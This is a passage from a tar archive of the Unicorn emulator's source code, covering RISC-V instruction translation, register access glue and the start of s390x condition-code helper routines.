gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); return true; } static bool gen_arith_imm_tl(DisasContext *ctx, arg_i *a, void (*func)(TCGContext *, TCGv, TCGv, TCGv)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, source2; source1 = tcg_temp_new(tcg_ctx); source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); tcg_gen_movi_tl(tcg_ctx, source2, a->imm); (*func)(tcg_ctx, source1, source1, source2); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } #ifdef TARGET_RISCV64 static void gen_addw(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, TCGv arg2) { tcg_gen_add_tl(tcg_ctx, ret, arg1, arg2); tcg_gen_ext32s_tl(tcg_ctx, ret, ret); } static void gen_subw(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, TCGv arg2) { tcg_gen_sub_tl(tcg_ctx, ret, arg1, arg2); tcg_gen_ext32s_tl(tcg_ctx, ret, ret); } static void gen_mulw(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, TCGv arg2) { tcg_gen_mul_tl(tcg_ctx, ret, arg1, arg2); tcg_gen_ext32s_tl(tcg_ctx, ret, ret); } static bool gen_arith_div_w(TCGContext *tcg_ctx, arg_r *a, void(*func)(TCGContext *, TCGv, TCGv, TCGv)) { TCGv source1, source2; source1 = tcg_temp_new(tcg_ctx); source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_ext32s_tl(tcg_ctx, source1, source1); tcg_gen_ext32s_tl(tcg_ctx, source2, source2); (*func)(tcg_ctx, source1, source1, source2); tcg_gen_ext32s_tl(tcg_ctx, source1, source1); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool gen_arith_div_uw(TCGContext *tcg_ctx, arg_r *a, void(*func)(TCGContext *, TCGv, TCGv, TCGv)) { TCGv source1, source2; source1 = tcg_temp_new(tcg_ctx); source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_ext32u_tl(tcg_ctx, source1, source1); tcg_gen_ext32u_tl(tcg_ctx, source2, source2); (*func)(tcg_ctx, source1, source1, source2); tcg_gen_ext32s_tl(tcg_ctx, source1, source1); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } #endif static bool gen_arith(TCGContext *tcg_ctx, arg_r *a, void(*func)(TCGContext *, TCGv, TCGv, TCGv)) { TCGv source1, source2; source1 = tcg_temp_new(tcg_ctx); source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); (*func)(tcg_ctx, source1, source1, source2); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool gen_shift(DisasContext *ctx, arg_r *a, void(*func)(TCGContext *, TCGv, TCGv, TCGv)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1 = tcg_temp_new(tcg_ctx); TCGv source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_andi_tl(tcg_ctx, source2, source2, TARGET_LONG_BITS - 1); (*func)(tcg_ctx, source1, source1, source2); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } /* Include insn module translation function */ #include "insn_trans/trans_rvi.inc.c" #include "insn_trans/trans_rvm.inc.c" #include "insn_trans/trans_rva.inc.c" #include "insn_trans/trans_rvf.inc.c" #include "insn_trans/trans_rvd.inc.c" #include "insn_trans/trans_privileged.inc.c" /* Include the auto-generated decoder for 16 bit insn */ #ifdef TARGET_RISCV32 #include "riscv32/decode_insn16.inc.c" #else #include "riscv64/decode_insn16.inc.c" #endif static void decode_opc(CPURISCVState *env, DisasContext *ctx, uint16_t opcode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* check for compressed insn */ if (extract16(opcode, 0, 2) != 3) { if (!has_ext(ctx, RVC)) { gen_exception_illegal(ctx); } else { ctx->invalid = false; ctx->pc_succ_insn = ctx->base.pc_next + 2; if (!decode_insn16(ctx, opcode)) { /* fall back to old decoder */ decode_RV32_64C(ctx, opcode); } else { // invalid instruction does not advance PC if (ctx->invalid) { ctx->pc_succ_insn -= 2; } } } } else { uint32_t opcode32 = opcode; opcode32 = deposit32(opcode32, 16, 16, translator_lduw(tcg_ctx, env, ctx->base.pc_next + 2)); ctx->pc_succ_insn = ctx->base.pc_next + 4; if (!decode_insn32(ctx, opcode32)) { gen_exception_illegal(ctx); } } } static void riscv_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); CPURISCVState *env = cs->env_ptr; RISCVCPU *cpu = RISCV_CPU(cs); // unicorn setup ctx->uc = cs->uc; ctx->pc_succ_insn = ctx->base.pc_first; ctx->mem_idx = ctx->base.tb->flags & TB_FLAGS_MMU_MASK; ctx->mstatus_fs = ctx->base.tb->flags & TB_FLAGS_MSTATUS_FS; ctx->priv_ver = env->priv_ver; if (riscv_has_ext(env, RVH)) { ctx->virt_enabled = riscv_cpu_virt_enabled(env); if (env->priv_ver == PRV_M && get_field(env->mstatus, MSTATUS_MPRV) && MSTATUS_MPV_ISSET(env)) { ctx->virt_enabled = true; } else if (env->priv == PRV_S && !riscv_cpu_virt_enabled(env) && get_field(env->hstatus, HSTATUS_SPRV) && get_field(env->hstatus, HSTATUS_SPV)) { ctx->virt_enabled = true; } } else { ctx->virt_enabled = false; } ctx->misa = env->misa; ctx->frm = -1; /* unknown rounding mode */ ctx->ext_ifencei = cpu->cfg.ext_ifencei; } static void riscv_tr_tb_start(DisasContextBase *db, CPUState *cpu) { } static void riscv_tr_insn_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_insn_start(tcg_ctx, ctx->base.pc_next); } static bool riscv_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cpu, const CPUBreakpoint *bp) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); ctx->base.is_jmp = DISAS_NORETURN; gen_exception_debug(tcg_ctx); /* The address covered by the breakpoint must be included in [tb->pc, tb->pc + tb->size) in order to for it to be properly cleared -- thus we increment the PC here so that the logic setting tb->size below does the right thing. */ ctx->base.pc_next += 4; return true; } static void riscv_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *ctx = container_of(dcbase, DisasContext, base); struct uc_struct *uc = ctx->uc; TCGContext *tcg_ctx = uc->tcg_ctx; CPURISCVState *env = cpu->env_ptr; uint16_t opcode16 = translator_lduw(tcg_ctx, env, ctx->base.pc_next); TCGOp *tcg_op, *prev_op = NULL; bool insn_hook = false; // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(uc, ctx->base.pc_next)) { // Unicorn: We have to exit current execution here. dcbase->is_jmp = DISAS_UC_EXIT; } else { // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_CODE, ctx->base.pc_next)) { // Sync PC in advance tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); // save the last operand prev_op = tcg_last_op(tcg_ctx); insn_hook = true; gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, uc, ctx->base.pc_next); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } decode_opc(env, ctx, opcode16); if (insn_hook) { // Unicorn: patch the callback to have the proper instruction size. if (prev_op) { // As explained further up in the function where prev_op is // assigned, we move forward in the tail queue, so we're modifying the // move instruction generated by gen_uc_tracecode() that contains // the instruction size to assign the proper size (replacing 0xF1F1F1F1). tcg_op = QTAILQ_NEXT(prev_op, link); } else { // this instruction is the first emulated code ever, // so the instruction operand is the first operand tcg_op = QTAILQ_FIRST(&tcg_ctx->ops); } tcg_op->args[1] = ctx->pc_succ_insn - ctx->base.pc_next; } ctx->base.pc_next = ctx->pc_succ_insn; if (ctx->base.is_jmp == DISAS_NEXT) { target_ulong page_start; page_start = ctx->base.pc_first & TARGET_PAGE_MASK; if (ctx->base.pc_next - page_start >= TARGET_PAGE_SIZE) { ctx->base.is_jmp = DISAS_TOO_MANY; } } } } static void riscv_tr_tb_stop(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; switch (ctx->base.is_jmp) { case DISAS_TOO_MANY: gen_goto_tb(ctx, 0, ctx->base.pc_next); break; case DISAS_NORETURN: break; case DISAS_UC_EXIT: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); gen_helper_uc_riscv_exit(ctx->uc->tcg_ctx, ctx->uc->tcg_ctx->cpu_env); break; default: g_assert_not_reached(); } } static const TranslatorOps riscv_tr_ops = { .init_disas_context = riscv_tr_init_disas_context, .tb_start = riscv_tr_tb_start, .insn_start = riscv_tr_insn_start, .breakpoint_check = riscv_tr_breakpoint_check, .translate_insn = riscv_tr_translate_insn, .tb_stop = riscv_tr_tb_stop, }; void gen_intermediate_code(CPUState *cs, TranslationBlock *tb, int max_insns) { DisasContext ctx; memset(&ctx, 0, sizeof(ctx)); translator_loop(&riscv_tr_ops, &ctx.base, cs, tb, max_insns); } void riscv_translate_init(struct uc_struct *uc) { int i; TCGContext *tcg_ctx = uc->tcg_ctx; /* cpu_gpr[0] is a placeholder for the zero register. Do not use it. */ /* Use the gen_set_gpr and gen_get_gpr helper functions when accessing */ /* registers, unless you specifically block reads/writes to reg 0 */ tcg_ctx->cpu_gpr[0] = NULL; for (i = 1; i < 32; i++) { tcg_ctx->cpu_gpr[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPURISCVState, gpr[i]), riscv_int_regnames[i]); } for (i = 0; i < 32; i++) { tcg_ctx->cpu_fpr[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPURISCVState, fpr[i]), riscv_fpr_regnames[i]); } tcg_ctx->cpu_pc = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPURISCVState, pc), "pc"); tcg_ctx->load_res = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPURISCVState, load_res), "load_res"); tcg_ctx->load_val = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPURISCVState, load_val), "load_val"); } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/unicorn.c�����������������������������������������������������������0000664�0000000�0000000�00000016616�14675241067�0020422�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "uc_priv.h" #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include "cpu_bits.h" #include <unicorn/riscv.h> #include "unicorn.h" static int csrno_map[] = { CSR_USTATUS, CSR_UIE, CSR_UTVEC, CSR_USCRATCH, CSR_UEPC, CSR_UCAUSE, CSR_UTVAL, CSR_UIP, CSR_FFLAGS, CSR_FRM, CSR_FCSR, CSR_CYCLE, CSR_TIME, CSR_INSTRET, CSR_HPMCOUNTER3, CSR_HPMCOUNTER4, CSR_HPMCOUNTER5, CSR_HPMCOUNTER6, CSR_HPMCOUNTER7, CSR_HPMCOUNTER8, CSR_HPMCOUNTER9, CSR_HPMCOUNTER10, CSR_HPMCOUNTER11, CSR_HPMCOUNTER12, CSR_HPMCOUNTER13, CSR_HPMCOUNTER14, CSR_HPMCOUNTER15, CSR_HPMCOUNTER16, CSR_HPMCOUNTER17, CSR_HPMCOUNTER18, CSR_HPMCOUNTER19, CSR_HPMCOUNTER20, CSR_HPMCOUNTER21, CSR_HPMCOUNTER22, CSR_HPMCOUNTER23, CSR_HPMCOUNTER24, CSR_HPMCOUNTER25, CSR_HPMCOUNTER26, CSR_HPMCOUNTER27, CSR_HPMCOUNTER28, CSR_HPMCOUNTER29, CSR_HPMCOUNTER30, CSR_HPMCOUNTER31, CSR_CYCLEH, CSR_TIMEH, CSR_INSTRETH, CSR_HPMCOUNTER3H, CSR_HPMCOUNTER4H, CSR_HPMCOUNTER5H, CSR_HPMCOUNTER6H, CSR_HPMCOUNTER7H, CSR_HPMCOUNTER8H, CSR_HPMCOUNTER9H, CSR_HPMCOUNTER10H, CSR_HPMCOUNTER11H, CSR_HPMCOUNTER12H, CSR_HPMCOUNTER13H, CSR_HPMCOUNTER14H, CSR_HPMCOUNTER15H, CSR_HPMCOUNTER16H, CSR_HPMCOUNTER17H, CSR_HPMCOUNTER18H, CSR_HPMCOUNTER19H, CSR_HPMCOUNTER20H, CSR_HPMCOUNTER21H, CSR_HPMCOUNTER22H, CSR_HPMCOUNTER23H, CSR_HPMCOUNTER24H, CSR_HPMCOUNTER25H, CSR_HPMCOUNTER26H, CSR_HPMCOUNTER27H, CSR_HPMCOUNTER28H, CSR_HPMCOUNTER29H, CSR_HPMCOUNTER30H, CSR_HPMCOUNTER31H, CSR_MCYCLE, CSR_MINSTRET, CSR_MCYCLEH, CSR_MINSTRETH, CSR_MVENDORID, CSR_MARCHID, CSR_MIMPID, CSR_MHARTID, CSR_MSTATUS, CSR_MISA, CSR_MEDELEG, CSR_MIDELEG, CSR_MIE, CSR_MTVEC, CSR_MCOUNTEREN, CSR_MSTATUSH, CSR_MUCOUNTEREN, CSR_MSCOUNTEREN, CSR_MHCOUNTEREN, CSR_MSCRATCH, CSR_MEPC, CSR_MCAUSE, CSR_MTVAL, CSR_MIP, CSR_MBADADDR, CSR_SSTATUS, CSR_SEDELEG, CSR_SIDELEG, CSR_SIE, CSR_STVEC, CSR_SCOUNTEREN, CSR_SSCRATCH, CSR_SEPC, CSR_SCAUSE, CSR_STVAL, CSR_SIP, CSR_SBADADDR, CSR_SPTBR, CSR_SATP, CSR_HSTATUS, CSR_HEDELEG, CSR_HIDELEG, CSR_HIE, CSR_HCOUNTEREN, CSR_HTVAL, CSR_HIP, CSR_HTINST, CSR_HGATP, CSR_HTIMEDELTA, CSR_HTIMEDELTAH, }; #define csrno_count (sizeof(csrno_map) / sizeof(int)) RISCVCPU *cpu_riscv_init(struct uc_struct *uc); static void riscv_set_pc(struct uc_struct *uc, uint64_t address) { RISCV_CPU(uc->cpu)->env.pc = address; } static uint64_t riscv_get_pc(struct uc_struct *uc) { return RISCV_CPU(uc->cpu)->env.pc; } static void riscv_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; RISCVCPU *cpu = (RISCVCPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } } static void reg_reset(struct uc_struct *uc) {} DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPURISCVState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_RISCV_REG_X0 && regid <= UC_RISCV_REG_X31) { #ifdef TARGET_RISCV64 CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->gpr[regid - UC_RISCV_REG_X0]; #else CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->gpr[regid - UC_RISCV_REG_X0]; #endif } else if (regid >= UC_RISCV_REG_F0 && regid <= UC_RISCV_REG_F31) { // "ft0".."ft31" CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->fpr[regid - UC_RISCV_REG_F0]; } else if (regid >= UC_RISCV_REG_USTATUS && regid < UC_RISCV_REG_USTATUS + csrno_count) { target_ulong val; int csrno = csrno_map[regid - UC_RISCV_REG_USTATUS]; riscv_csrrw(env, csrno, &val, -1, 0); #ifdef TARGET_RISCV64 CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = (uint64_t)val; #else CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = (uint32_t)val; #endif } else { switch (regid) { default: break; case UC_RISCV_REG_PC: #ifdef TARGET_RISCV64 CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->pc; #else CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->pc; #endif break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPURISCVState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_RISCV_REG_X0 && regid <= UC_RISCV_REG_X31) { #ifdef TARGET_RISCV64 CHECK_REG_TYPE(uint64_t); env->gpr[regid - UC_RISCV_REG_X0] = *(uint64_t *)value; #else CHECK_REG_TYPE(uint32_t); env->gpr[regid - UC_RISCV_REG_X0] = *(uint32_t *)value; #endif } else if (regid >= UC_RISCV_REG_F0 && regid <= UC_RISCV_REG_F31) { // "ft0".."ft31" CHECK_REG_TYPE(uint64_t); env->fpr[regid - UC_RISCV_REG_F0] = *(uint64_t *)value; } else if (regid >= UC_RISCV_REG_USTATUS && regid < UC_RISCV_REG_USTATUS + csrno_count) { target_ulong val; int csrno = csrno_map[regid - UC_RISCV_REG_USTATUS]; #ifdef TARGET_RISCV64 CHECK_REG_TYPE(uint64_t); riscv_csrrw(env, csrno, &val, *(uint64_t *)value, -1); #else CHECK_REG_TYPE(uint32_t); riscv_csrrw(env, csrno, &val, *(uint32_t *)value, -1); #endif } else { switch (regid) { default: break; case UC_RISCV_REG_PC: #ifdef TARGET_RISCV64 CHECK_REG_TYPE(uint64_t); env->pc = *(uint64_t *)value; #else CHECK_REG_TYPE(uint32_t); env->pc = *(uint32_t *)value; #endif *setpc = 1; break; } } return ret; } static bool riscv_stop_interrupt(struct uc_struct *uc, int intno) { // detect stop exception switch (intno) { default: return false; case RISCV_EXCP_UNICORN_END: return true; case RISCV_EXCP_BREAKPOINT: uc->invalid_error = UC_ERR_EXCEPTION; return true; } } static bool riscv_insn_hook_validate(uint32_t insn_enum) { return false; } static int riscv_cpus_init(struct uc_struct *uc, const char *cpu_model) { RISCVCPU *cpu; cpu = cpu_riscv_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->release = riscv_release; uc->set_pc = riscv_set_pc; uc->get_pc = riscv_get_pc; uc->stop_interrupt = riscv_stop_interrupt; uc->insn_hook_validate = riscv_insn_hook_validate; uc->cpus_init = riscv_cpus_init; uc->cpu_context_size = offsetof(CPURISCVState, rdtime_fn); uc_common_init(uc); } ������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/unicorn.h�����������������������������������������������������������0000664�0000000�0000000�00000001542�14675241067�0020417�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #ifndef UC_QEMU_TARGET_RISCV_H #define UC_QEMU_TARGET_RISCV_H // functions to read & write registers uc_err reg_read_riscv32(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_read_riscv64(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_riscv32(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); uc_err reg_write_riscv64(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_riscv32(struct uc_struct *uc); void uc_init_riscv64(struct uc_struct *uc); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/��������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016327�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cc_helper.c���������������������������������������������������������0000664�0000000�0000000�00000030431�14675241067�0020420�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 condition code helper routines * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2009 Alexander Graf * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "tcg_s390x.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "qemu/host-utils.h" /* #define DEBUG_HELPER */ #ifdef DEBUG_HELPER #define HELPER_LOG(x, ...) qemu_log(x) #else #define HELPER_LOG(x, ...) #endif static uint32_t cc_calc_ltgt_32(int32_t src, int32_t dst) { if (src == dst) { return 0; } else if (src < dst) { return 1; } else { return 2; } } static uint32_t cc_calc_ltgt0_32(int32_t dst) { return cc_calc_ltgt_32(dst, 0); } static uint32_t cc_calc_ltgt_64(int64_t src, int64_t dst) { if (src == dst) { return 0; } else if (src < dst) { return 1; } else { return 2; } } static uint32_t cc_calc_ltgt0_64(int64_t dst) { return cc_calc_ltgt_64(dst, 0); } static uint32_t cc_calc_ltugtu_32(uint32_t src, uint32_t dst) { if (src == dst) { return 0; } else if (src < dst) { return 1; } else { return 2; } } static uint32_t cc_calc_ltugtu_64(uint64_t src, uint64_t dst) { if (src == dst) { return 0; } else if (src < dst) { return 1; } else { return 2; } } static uint32_t cc_calc_tm_32(uint32_t val, uint32_t mask) { uint32_t r = val & mask; if (r == 0) { return 0; } else if (r == mask) { return 3; } else { return 1; } } static uint32_t cc_calc_tm_64(uint64_t val, uint64_t mask) { uint64_t r = val & mask; if (r == 0) { return 0; } else if (r == mask) { return 3; } else { int top = clz64(mask); if ((int64_t)(val << top) < 0) { return 2; } else { return 1; } } } static uint32_t cc_calc_nz(uint64_t dst) { return !!dst; } static uint32_t cc_calc_add_64(int64_t a1, int64_t a2, int64_t ar) { if ((a1 > 0 && a2 > 0 && ar < 0) || (a1 < 0 && a2 < 0 && ar > 0)) { return 3; /* overflow */ } else { if (ar < 0) { return 1; } else if (ar > 0) { return 2; } else { return 0; } } } static uint32_t cc_calc_addu_64(uint64_t a1, uint64_t a2, uint64_t ar) { return (ar != 0) + 2 * (ar < a1); } static uint32_t cc_calc_addc_64(uint64_t a1, uint64_t a2, uint64_t ar) { /* Recover a2 + carry_in. */ uint64_t a2c = ar - a1; /* Check for a2+carry_in overflow, then a1+a2c overflow. */ int carry_out = (a2c < a2) || (ar < a1); return (ar != 0) + 2 * carry_out; } static uint32_t cc_calc_sub_64(int64_t a1, int64_t a2, int64_t ar) { if ((a1 > 0 && a2 < 0 && ar < 0) || (a1 < 0 && a2 > 0 && ar > 0)) { return 3; /* overflow */ } else { if (ar < 0) { return 1; } else if (ar > 0) { return 2; } else { return 0; } } } static uint32_t cc_calc_subu_64(uint64_t a1, uint64_t a2, uint64_t ar) { if (ar == 0) { return 2; } else { if (a2 > a1) { return 1; } else { return 3; } } } static uint32_t cc_calc_subb_64(uint64_t a1, uint64_t a2, uint64_t ar) { int borrow_out; if (ar != a1 - a2) { /* difference means borrow-in */ borrow_out = (a2 >= a1); } else { borrow_out = (a2 > a1); } return (ar != 0) + 2 * !borrow_out; } static uint32_t cc_calc_abs_64(int64_t dst) { if ((uint64_t)dst == 0x8000000000000000ULL) { return 3; } else if (dst) { return 2; } else { return 0; } } static uint32_t cc_calc_nabs_64(int64_t dst) { return !!dst; } static uint32_t cc_calc_comp_64(int64_t dst) { if ((uint64_t)dst == 0x8000000000000000ULL) { return 3; } else if (dst < 0) { return 1; } else if (dst > 0) { return 2; } else { return 0; } } static uint32_t cc_calc_add_32(int32_t a1, int32_t a2, int32_t ar) { if ((a1 > 0 && a2 > 0 && ar < 0) || (a1 < 0 && a2 < 0 && ar > 0)) { return 3; /* overflow */ } else { if (ar < 0) { return 1; } else if (ar > 0) { return 2; } else { return 0; } } } static uint32_t cc_calc_addu_32(uint32_t a1, uint32_t a2, uint32_t ar) { return (ar != 0) + 2 * (ar < a1); } static uint32_t cc_calc_addc_32(uint32_t a1, uint32_t a2, uint32_t ar) { /* Recover a2 + carry_in. */ uint32_t a2c = ar - a1; /* Check for a2+carry_in overflow, then a1+a2c overflow. */ int carry_out = (a2c < a2) || (ar < a1); return (ar != 0) + 2 * carry_out; } static uint32_t cc_calc_sub_32(int32_t a1, int32_t a2, int32_t ar) { if ((a1 > 0 && a2 < 0 && ar < 0) || (a1 < 0 && a2 > 0 && ar > 0)) { return 3; /* overflow */ } else { if (ar < 0) { return 1; } else if (ar > 0) { return 2; } else { return 0; } } } static uint32_t cc_calc_subu_32(uint32_t a1, uint32_t a2, uint32_t ar) { if (ar == 0) { return 2; } else { if (a2 > a1) { return 1; } else { return 3; } } } static uint32_t cc_calc_subb_32(uint32_t a1, uint32_t a2, uint32_t ar) { int borrow_out; if (ar != a1 - a2) { /* difference means borrow-in */ borrow_out = (a2 >= a1); } else { borrow_out = (a2 > a1); } return (ar != 0) + 2 * !borrow_out; } static uint32_t cc_calc_abs_32(int32_t dst) { if ((uint32_t)dst == 0x80000000UL) { return 3; } else if (dst) { return 2; } else { return 0; } } static uint32_t cc_calc_nabs_32(int32_t dst) { return !!dst; } static uint32_t cc_calc_comp_32(int32_t dst) { if ((uint32_t)dst == 0x80000000UL) { return 3; } else if (dst < 0) { return 1; } else if (dst > 0) { return 2; } else { return 0; } } /* calculate condition code for insert character under mask insn */ static uint32_t cc_calc_icm(uint64_t mask, uint64_t val) { if ((val & mask) == 0) { return 0; } else { int top = clz64(mask); if ((int64_t)(val << top) < 0) { return 1; } else { return 2; } } } static uint32_t cc_calc_sla(uint64_t src, int shift) { uint64_t mask = -1ULL << (63 - shift); uint64_t sign = 1ULL << 63; uint64_t match; int64_t r; /* Check if the sign bit stays the same. */ if (src & sign) { match = mask; } else { match = 0; } if ((src & mask) != match) { /* Overflow. */ return 3; } r = ((src << shift) & ~sign) | (src & sign); if (r == 0) { return 0; } else if (r < 0) { return 1; } return 2; } static uint32_t cc_calc_flogr(uint64_t dst) { return dst ? 2 : 0; } static uint32_t cc_calc_lcbb(uint64_t dst) { return dst == 16 ? 0 : 3; } static uint32_t cc_calc_vc(uint64_t low, uint64_t high) { if (high == -1ull && low == -1ull) { /* all elements match */ return 0; } else if (high == 0 && low == 0) { /* no elements match */ return 3; } else { /* some elements but not all match */ return 1; } } static uint32_t do_calc_cc(CPUS390XState *env, uint32_t cc_op, uint64_t src, uint64_t dst, uint64_t vr) { uint32_t r = 0; switch (cc_op) { case CC_OP_CONST0: case CC_OP_CONST1: case CC_OP_CONST2: case CC_OP_CONST3: /* cc_op value _is_ cc */ r = cc_op; break; case CC_OP_LTGT0_32: r = cc_calc_ltgt0_32(dst); break; case CC_OP_LTGT0_64: r = cc_calc_ltgt0_64(dst); break; case CC_OP_LTGT_32: r = cc_calc_ltgt_32(src, dst); break; case CC_OP_LTGT_64: r = cc_calc_ltgt_64(src, dst); break; case CC_OP_LTUGTU_32: r = cc_calc_ltugtu_32(src, dst); break; case CC_OP_LTUGTU_64: r = cc_calc_ltugtu_64(src, dst); break; case CC_OP_TM_32: r = cc_calc_tm_32(src, dst); break; case CC_OP_TM_64: r = cc_calc_tm_64(src, dst); break; case CC_OP_NZ: r = cc_calc_nz(dst); break; case CC_OP_ADD_64: r = cc_calc_add_64(src, dst, vr); break; case CC_OP_ADDU_64: r = cc_calc_addu_64(src, dst, vr); break; case CC_OP_ADDC_64: r = cc_calc_addc_64(src, dst, vr); break; case CC_OP_SUB_64: r = cc_calc_sub_64(src, dst, vr); break; case CC_OP_SUBU_64: r = cc_calc_subu_64(src, dst, vr); break; case CC_OP_SUBB_64: r = cc_calc_subb_64(src, dst, vr); break; case CC_OP_ABS_64: r = cc_calc_abs_64(dst); break; case CC_OP_NABS_64: r = cc_calc_nabs_64(dst); break; case CC_OP_COMP_64: r = cc_calc_comp_64(dst); break; case CC_OP_ADD_32: r = cc_calc_add_32(src, dst, vr); break; case CC_OP_ADDU_32: r = cc_calc_addu_32(src, dst, vr); break; case CC_OP_ADDC_32: r = cc_calc_addc_32(src, dst, vr); break; case CC_OP_SUB_32: r = cc_calc_sub_32(src, dst, vr); break; case 